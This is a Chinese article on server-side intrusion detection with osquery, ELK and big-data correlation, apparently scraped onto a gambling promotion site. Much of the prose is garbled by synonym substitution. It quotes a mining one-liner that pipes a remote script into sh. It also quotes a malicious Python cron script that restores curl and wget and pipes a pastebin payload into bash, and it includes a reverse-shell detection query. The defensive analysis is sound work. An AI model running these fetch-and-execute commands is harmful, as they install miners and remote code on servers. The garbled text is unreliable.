态势感知——服务器安全策略探究 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

态势感知——服务器安全策略探究

申博_新闻事件 申博 232次浏览 已收录 0个评论

0x00、营业需求

企业IT架构数字化转型的大潮中,往往会面对林林总总的平安要挟,包孕:体系和运用软件破绽运用进击,APT进击,数据泄漏,云效劳器滥用,DDoS进击等。同时为了应对速率越来越快的网络立功进击,和针对性进击的多态化。为我们平安职员提出了更高的请求。

在做应急相应平安事宜历程的历程当中,确认进击陈迹一样平常从以下几个方面:

态势感知——服务器安全策略探究

0x01、效劳器平安告警

在态势感知产品中,在伺服器上放置EDR终端是实现伺服器安全量化的一个良好过程。因为我们可以对服务器的网络历史、端口、账号、软件和文件号等基本的安全数据进行分析。通过这些基础数据的处理过程,通过后台大数据的分析和处理过程,构成了我们对敲诈勒索的感知。

如果最后一篇文章主要讨论如何从网络层进行检测,本文主要从服务器端进行检测,服务器端检测有以下优点:

·无辜网络层敲诈检测无法与终端数据链接,形成的证据链可信度较低。

·加密连接、SSL bash反连接等,无法通过网络检测,需要深度检测,检测成本太高。

·威胁狩猎,能够深入调查,猎取邪恶意图。

让我们从入侵开始:

·主机丢失

检测思路:网络服务器端基本数据:及时的网络连接数据,以及交易威胁的谍报技术数据源。

及时网络衔接数据,试验状况搭建:经由过程kolide+osquery+ElasticSearch+kibana。

完成步调:

1、从效劳器端猎取基本外联网络数据。

2、经由过程flink或许spark streaming做及时Top历程、Top外联IP统计,剖析一切效劳器上传的外联孤岛数据,也能够编纂划定规矩重点监控下载运用顺序,或许下载对端的运用若是是HFS效劳。须要重点存眷。固然这里能够玩的playbook许多,须要用户本身发掘。

态势感知——服务器安全策略探究

3、从中猎取到应有顺序途径、对外衔接IP信息,和端口。经由过程IP地点查询要挟谍报,若是对端IP地点运用的C2、Tor、VPN、SS等地点视为沦陷主机。态势感知——服务器安全策略探究

态势感知——服务器安全策略探究

· 对外可疑衔接

检测思绪:这里主若是增添内容特性,比如说:上传装备基本信息、发送进击指令、猎取公网IP地点、黑客进击衔接等。效劳器端须要把歹意顺序上传云查杀或许云沙箱做深切检测。

试验状况:Malice(支撑Yara+多杀毒引擎集成+virustotal)+ClamAV +ElasticSearch+kibana。

IDS检测划定规矩完美:

态势感知——服务器安全策略探究

固然须要一个平安Team保护这个划定规矩。

检测流程:

1、经由过程IDS检测到对外衔接。

2、经由过程网络通讯历程联系关系到文件。

3、上传文件到云查杀体系中检测。若是发明病毒告警。

· 对外DDoS

检测思绪:经由过程猎取及时历程快照,网络对外衔接快照,网络层猎取其流量信息,同时也上传对应的历程文件到云查杀和云沙箱检测。在网络层检测经由过程IDS划定规矩检测到对外DDoS进击最多为:NTP反射进击、memcache反射进击。但是在效劳器端检测会发明更多进击方式,比方:CC进击、SIP协定进击、视频协定进击、SYN Flood、ACK Flood等。固然须要客户端抓包进一步确认。

检测流程:

1、猎取历程快照,网络对外衔接快照,对外衔接网络流量(须要驱动支撑)或许猎取总流量。

2、实行抓包顺序,收罗效劳器端Pcap包,上传Pcap包样本到效劳器端。

3、经由过程种种DDoS进击划定规矩过滤,若是发明预定的进击范例。

· 挖矿检测

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

检测思绪:特性是CPU占用率太高。经由过程上传历程快照,同时猎取相似top敕令CPU占用率信息。能够肯定挖矿历程。固然另有 /bin/sh -c /usr/bin/curl -sL https://xmr.tgywl.cn|sh 直接挖矿。

检测流程:

1、猎取历程快照,CPU占用率信息。

2、屡次CPU占率太高的历程聚合。

3、上传文件到云查杀体系中检测。若是发明病毒告警。

4、复查各个端口被入侵的陈迹,若是发生以下进击告警,须要大数据联系关系剖析(flink or spark streaming)。

态势感知——服务器安全策略探究

· 对外爆破

检测思绪:联系关系网络层检测和效劳器端检测相干历程。

检测流程:

1、猎取历程快照,对外网络衔接快照。

2、猎取网络层面种种协定的暴力破解告警。

3、运用flink or spark streaming 做大数据联系关系剖析。

· 蠕虫病毒

检测思绪:若是存在对外扫描功用,经由过程大数据剖析网络衔接,短时间内过量衔接视为可疑。

检测流程:

1、猎取历程快照,对外网络衔接快照。

2、猎取网络层面对外可疑衔接告警。

3、上传文件到云查杀体系中检测。进一步剖析,发明病毒标记为蠕虫病毒告警。

· 反弹shell

检测思绪:sh或许bash运转翻开长途衔接,视为反弹shell。

检测流程:

1、猎取历程快照,对外网络衔接快照。

2、查询语句。

"behavioral_reverse_shell": {
      "query" : "SELECT DISTINCT(processes.pid), processes.parent, processes.name, processes.path, processes.cmdline, processes.cwd, processes.root, processes.uid, processes.gid, processes.start_time, process_open_sockets.remote_address, process_open_sockets.remote_port, (SELECT cmdline FROM processes AS parent_cmdline WHERE pid=processes.parent) AS parent_cmdline FROM processes JOIN process_open_sockets USING (pid) LEFT OUTER JOIN process_open_files ON processes.pid = process_open_files.pid WHERE (name='sh' OR name='bash') AND remote_address NOT IN ('0.0.0.0', '::', '') AND remote_address NOT LIKE '10.%' AND remote_address NOT LIKE '192.168.%';",
      "interval" : 600,
      "description" : "Find shell processes that have open sockets"
    },

· rootkit检测

我们先看一个入侵案例,以下剧本是用户放到准时义务中的经由base64加密的剧本,经由过程替代curl、wget完成历程网络通讯隐蔽的目标。

import os
import os.path

def GetDeps():

   if os.path.isfile('/usr/bin/url'):
        os.system("mv /usr/bin/url /usr/bin/curl")
        os.system("chmod 777 /usr/bin/curl")
        os.system("chmod +x /usr/bin/curl")

    if os.path.isfile('/usr/bin/get'):
        os.system("mv /usr/bin/get /usr/bin/wget")
        os.system("chmod 777 /usr/bin/wget")
        os.system("chmod +x /usr/bin/wget")

    if not os.path.isfile('/usr/bin/wget'):
        os.system("yum clean all")
        os.system("yum -y install wget")
        os.system("apt-get update")
        os.system("apt-get -y install wget")

    if not os.path.isfile('/usr/bin/curl'):
        os.system("yum clean all")
        os.system("yum -y install curl")
        os.system("apt-get update")
        os.system("apt-get -y install wget")

if os.getuid()==0:
    GetDeps()
os.system("(curl -fsSL https://pastebin.com/raw/JuBCmASZ||wget -q -O- https://pastebin.com/raw/JuBCmASZ)|bash%7Cbash)")

我们设备服务器上的rootkit序列有问题。

测试过程

需要从远程下载wget\curl\ps\ls\netstat\ss等网络和文件检测工具

2. 通过与本地相应文档的比较,找出差异。

3.如果存在差异,确认rootkit存在恶意行为并发出警告。

·勒索软件

测试你的想法:

1. 上传文件建立基本数据信息,上传过程快照信息。

2. 对日常普通文件进行统计,建立数据,设置动态基础数据基线。

3、如果单台服务器每天正常建立2次以上,则有必要将相应的文件上传到云端进行分析,如果发明敲诈软件进行病毒标签报警。

0x03、总结

效劳器平安检测是一项异常烦琐,而且特殊状况比较多的事情,须要这些检测划定规矩和手腕自动化成要挟模子。同时,人工threat huning效果也要赓续到场,构成正向反应,良性循环。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明态势感知——服务器安全策略探究
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址